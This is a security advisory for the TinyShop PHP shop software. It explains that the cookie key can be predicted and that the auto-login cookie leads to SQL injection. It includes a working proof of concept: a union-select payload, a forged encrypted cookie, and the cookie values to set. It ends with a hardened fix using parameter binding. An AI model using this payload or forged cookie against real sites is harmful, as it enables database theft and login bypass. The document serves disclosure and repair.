### Summary: Unfiltered cookie value leads to SQL injection

### Details:

First, look at how the cookie is encrypted:

```php
/// Encryption/decryption routine
private static function code($string, $op = "decode", $key = '', $expiry = 0)
/// Encryption call:
$value = Crypt::encode($value, self::getSafeCode());
/// Decryption call:
$cookie = Crypt::decode($cryptCookie, self::getSafeCode());
```

The key point here is `self::getSafeCode()`:

```php
public static function getSafeCode()
{
    if (self::$safeCode == '') self::setSafeCode();
    return self::$safeCode;
}

public static function setSafeCode($scode = '')
{
    self::$safeCode = $scode . self::cookieId();
}

private static function cookieId()
{
    // Level 0 (the default): constant key 1
    if (self::$safeLave == 0) return 1;
    // Level 1: md5 of the client IP
    if (self::$safeLave == 1) return md5(Chips::getIP());
    // Level 2: md5 of the client IP plus the User-Agent header
    if (self::$safeLave == 2) return md5(Chips::getIP() . $_SERVER["HTTP_USER_AGENT"]);
}
```

This means the encryption key for the whole cookie can only be one of three values, and all three are values the user can obtain. The default is the first case, i.e. `key=1`.

Now look at this method (classes/common.php):

```php
// User information for auto-login
static function autoLoginUserInfo()
{
    $cookie = new Cookie();
    $cookie->setSafeCode(Tiny::app()->getSafeCode());
    $autologin = $cookie->get('autologin');
    $obj = null;
    if ($autologin != null) {
        $email = $autologin['email'];
        $password = $autologin['password'];
        $model = new Model("user as us");
        // $email is interpolated into the WHERE clause without escaping
        $obj = $model->join("left join customer as cu on us.id = cu.user_id")
                     ->fields("us.*,cu.group_id,cu.login_time")
                     ->where("us.email='$email'")
                     ->find();
        if ($obj['password'] != $password) {
            $obj = null;
        }
    }
    return $obj;
}
```

It reads the `autologin` cookie value; here is how that value is fetched:

```php
public static function get($name)
{
    if (self::checkSafe() == 1) {
        if (isset($_COOKIE[self::$per . $name])) {
            $cryptCookie = $_COOKIE[self::$per . $name];
            $cookie = Crypt::decode($cryptCookie, self::getSafeCode());
            $tem = substr($cookie, 0, 10);
            // The decrypted value is unserialized directly; nothing else is validated
            if (preg_match('/^[Oa]:\d+:.*/', $tem)) $cookie = unserialize($cookie);
            return $cookie;
        }
        return null;
    }
    if (self::checkSafe() == 0) self::clear($name); // Tiny::msg('Illegal COOKIE theft, the system will stop working!', 0);
    else return null;
}
```

As you can see, after decryption the cookie is only unserialized, so its contents go straight into the backend SQL statement.

The PoC below uses the default `$key=1`:

Injected SQL fragment: `' union select 1,user(),1,1,1,1,1,1,1#`
After serialization and encryption, the ciphertext is: `bfc8bbdb4aOTkwMDQwMDMxMzkxNGY/MDRkZDBhZjIzPGE4MWA0NzVhOjE9e3EyNTgibW1gbGwiOXI8MzE6KyMgdW5pbm4gc2VtZWN9IjgpdXpley0hLDEuNyoxJTcuMikxKjEjKzt3Ojg6J3lkcHV/bHNkIjtzODE6IjAmOH0`

Set the cookies: `safecode=1`, `Tiny_autologin=bfc8bbdb4aOTkwMDQwMDMxMzkxNGY/MDRkZDBhZjIzPGE4MWA0NzVhOjE9e3EyNTgibW1gbGwiOXI8MzE6KyMgdW5pbm4gc2VtZWN9IjgpdXpley0hLDEuNyoxJTcuMikxKjEjKzt3Ojg6J3lkcHV/bHNkIjtzODE6IjAmOH0`

Then visit the home page and the username is displayed:

![BaiduHi_2014-9-4_21-28-16.png](https://images.seebug.org/upload/201409/04212918ef2a12cf5feef1fdf1cf1016551bdf53.png)

![BaiduHi_2014-9-4_21-28-24.png](https://images.seebug.org/upload/201409/04212935c98dd1062a12db4ce1dfca32fb29ed60.png)

![BaiduHi_2014-9-4_21-28-47.png](https://images.seebug.org/upload/201409/04212944158a36a64f603b04ebb0cf1effe30834.png)

### Proof of vulnerability:

See the three screenshots above.
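A hardened version of the auto-login lookup, added here as an example and not TinyShop's own code: it parses the cookie with `json_decode` instead of `unserialize`, validates the email, binds it as a query parameter, and compares the password hash in constant time. It assumes a configured PDO connection (`$pdo`) in place of the project's `Model` class and that the decrypted cookie is handed over as a string.

```php
<?php
// Added example, not TinyShop's own code. Assumption: $pdo is a configured
// PDO connection and $cookieJson is the decrypted autologin cookie as a string.

function autoLoginUserInfoHardened(PDO $pdo, ?string $cookieJson): ?array
{
    if ($cookieJson === null) {
        return null;
    }
    // json_decode instead of unserialize(): attacker-controlled serialized
    // data can instantiate arbitrary classes (PHP object injection).
    $autologin = json_decode($cookieJson, true);
    if (!is_array($autologin)
        || !isset($autologin['email'], $autologin['password'])
        || !is_string($autologin['email'])
        || !is_string($autologin['password'])) {
        return null;
    }
    // Reject anything that is not shaped like an email before it reaches the DB.
    $email = filter_var($autologin['email'], FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        return null;
    }
    // Parameter binding: the email travels to MySQL as data, never as SQL text,
    // so a value such as "' union select ..." cannot change the query.
    $stmt = $pdo->prepare(
        'SELECT us.*, cu.group_id, cu.login_time'
        . ' FROM user AS us'
        . ' LEFT JOIN customer AS cu ON us.id = cu.user_id'
        . ' WHERE us.email = :email'
    );
    $stmt->execute([':email' => $email]);
    $obj = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($obj === false) {
        return null;
    }
    // Constant-time comparison of the stored hash with the cookie's copy.
    if (!hash_equals((string) $obj['password'], $autologin['password'])) {
        return null;
    }
    return $obj;
}
```

Parameter binding closes the injection sink only; the predictable safe code (default `1`) should also be replaced by a per-installation random secret kept server-side, so that cookies can no longer be forged by anyone who knows the key derivation.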